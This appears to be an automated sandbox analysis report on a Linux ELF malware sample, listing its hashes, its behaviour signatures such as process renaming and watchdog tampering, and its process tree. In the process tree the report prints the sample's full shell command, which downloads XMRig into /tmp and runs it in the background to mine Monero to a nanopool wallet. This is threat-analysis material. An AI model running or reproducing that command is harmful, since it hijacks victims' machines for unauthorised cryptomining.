Analysis
-
max time kernel
149s -
max time network
131s -
platform
ubuntu-20.04_amd64 -
resource
ubuntu2004-amd64-20240221-en -
resource tags
-
submitted
22/03/2024, 02:57
General
-
Target
864533db99aade7897c872cffb6e991e166adb370bbad3c0ec969bf646d92dcc.elf
-
Size
28KB
-
MD5
da93f99c9d6e98e69d2f6fb3558c1b74
-
SHA1
e2ac9a127c3ff440eb8c45894da95e43b8bf3a18
-
SHA256
864533db99aade7897c872cffb6e991e166adb370bbad3c0ec969bf646d92dcc
-
SHA512
74dc76d011aa4c1087e6ce7483d8d4c4573a8815237622cf88863cfb3c6ac3f2278dbfbdbb2bba8dbcfdb9fdf315203cb5343e0088875ee7da2e8c38c9c0360e
-
SSDEEP
384:McRvMLsiLPfToCQ667Buk3JWuxZ6MiV44vG7iC/PzpL59j2aI8yURza/2ml6AaJB:NRkLnT+I0JWnlV0isF1I8HazldyyGI8
Malware Config
Signatures
-
XMRig Miner payload 2 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Changes its process name 1 IoCs
-
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
-
Reads runtime system information 4 IoCs
Reads data from /proc virtual filesystem.
-
Writes file to tmp directory 2 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/864533db99aade7897c872cffb6e991e166adb370bbad3c0ec969bf646d92dcc.elf/tmp/864533db99aade7897c872cffb6e991e166adb370bbad3c0ec969bf646d92dcc.elf1⤵
- Changes its process name
- Reads runtime system information
-
/bin/shsh -c "wget https://github.com/xmrig/xmrig/releases/download/v6.21.1/xmrig-6.21.1-linux-x64.tar.gz && tar -xzf xmrig-6.21.1-linux-x64.tar.gz && mv xmrig-6.21.1 /tmp/ && rm -rf xmrig-6.21.1-linux-x64.tar.gz && cd /tmp/xmrig-6.21.1 && chmod 777 * && ./xmrig --opencl --cuda -o xmr-eu1.nanopool.org:14433 -u 49WVNTHfo5c7zfYi3METsCPW93hLJFYNKBS5GZDxSbuZA1FNJULGvkkY5y7sDozjTTMgeT3JyqLfV38TGzqMPuiGJzeHmeZ --tls --coin monero --background"1⤵
-
/usr/bin/wgetwget https://github.com/xmrig/xmrig/releases/download/v6.21.1/xmrig-6.21.1-linux-x64.tar.gz2⤵
- Writes file to tmp directory
-
-
/usr/bin/tartar -xzf xmrig-6.21.1-linux-x64.tar.gz2⤵
- Reads runtime system information
- Writes file to tmp directory
-
/usr/local/sbin/gzipgzip -d3⤵
-
-
/usr/local/bin/gzipgzip -d3⤵
-
-
/usr/sbin/gzipgzip -d3⤵
-
-
/usr/bin/gzipgzip -d3⤵
-
-
-
/usr/bin/mv2⤵
- Reads runtime system information
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
165B
MD59a302644404daebfb496bc01a452e4ec
SHA165e07415fb444ac2c5ae2085fad1e81c0c368383
SHA256b1b7369256136b473d7f15f7c325e58821a2470459712c68686678d552504de0
SHA51256c61f5282a2bbbdd7e728800b837e65f6bc346a7373ac2d8c3702e3c991ad2494e52e646e8712fae13c02b1d03cf918fc082b2cf29c870ffc26fe2fb4e825b4
-
Filesize
1.3MB
MD500bade8ffbcee18c1ca02b7674e2a454
SHA139f2a874f3a132dcf4fd9324d859ffc87dd68e21
SHA256d254114811f119645eadb5e7d1b5d61c7004c6e1564454427763c1632d4395c7
SHA5124eebadfae445eea89e433a0a6e082897233f4a6f9a61d8c91753a9461bae159a9429e560a548d180e50d0d623a6928cfb9b7780905a7110d9a8185ff4936dc3c
-
Filesize
8.2MB
MD55c43366798c0732fc300e9fa1110ac80
SHA1d66c09eeac08dc47aa797f9ad83a98ce75d58b1d
SHA25633e46bf90ea9f0c4d91f4edd8450b35944e8a355c76a4c318e900d2d7e163c16
SHA512e7d667280ecc5af7527eaf4e1af36dc5ccd82fa791f4c14de8b8d57d42a223bfbfcae82aff13afa69f3e9105a1a7a4230c1f75cb9eb88cf145b1a7fcd97cbdc9